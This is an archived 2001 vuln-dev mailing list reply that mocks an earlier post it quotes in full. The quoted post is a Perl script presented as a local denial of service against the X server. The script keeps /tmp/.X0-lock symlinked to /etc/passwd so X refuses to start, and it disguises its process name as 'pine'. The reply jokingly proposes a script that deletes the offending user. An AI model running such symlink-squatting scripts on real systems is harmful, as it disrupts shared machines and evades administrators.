Vulnerability Development mailing list archives
Re: *SERIOUS* local dos in X
From: 3APA3A <3APA3A () SECURITY NNOV RU>
Date: Tue, 11 Dec 2001 10:12:48 +0300
Hello ac1d-burN, This problem was patched long time ago by implementing rmuser script: something like #!/bin/sh if ls -l /tmp/.X0-lock | grep '\->' then rmuser `ls -l /tmp/.X0-lock | awk 'print ($3)'` fi will resolve this problem _completely_.... ;) --Monday, December 10, 2001, 8:50:28 PM, you wrote to vuln-dev () security-focus com: ab> greetings readers, ab> #!/usr/bin/perl ab> # WARNING - WARNING - WARNING - WARNING - WARNING - WARNING ab> # WARNING - WARNING - WARNING - WARNING - WARNING - WARNING ab> # ab> # advanced lokal denial of service attack against X. ab> # ab> # short demostration: ab> # [acidburn@localhost acidburn]$ ./X-d0S.pl ab> # --- ab> # [root@localhost root]# X & ab> # [1] 8639 ab> # ab> # Fatal server error: ab> # Server is already active for display 0 ab> # If this server is no longer running, remove /tmp/.X0-lock ab> # and start again. ab> ## slightly broken !!! ab> #!/usr/bin/perl ab> $EVIL_FILE="/tmp/.X0-lock"; ab> $0 = "pine" ; # ph00l sysadmin with stealth techniqz ab> system("ln -s /etc/passwd $EVIL_FILE 2&>1"); ab> while(ACIDBURE.IS.ELITE) { ab> if (! -e $EVIL_FILE) { ab> system("ln -s /etc/passwd $EVIL_FILE 2&>1"); ab> } ab> } ab> greets: Sp0aR and rloxley! ab> signed, ab> acid burn ab> ------------------------------------------------------- -- ~/ZARAZA ЭНИАКам - по морде! (Лем)
Current thread:
- *SERIOUS* local dos in X ac1d-burN (Dec 10)
- Re: *SERIOUS* local dos in X 3APA3A (Dec 11)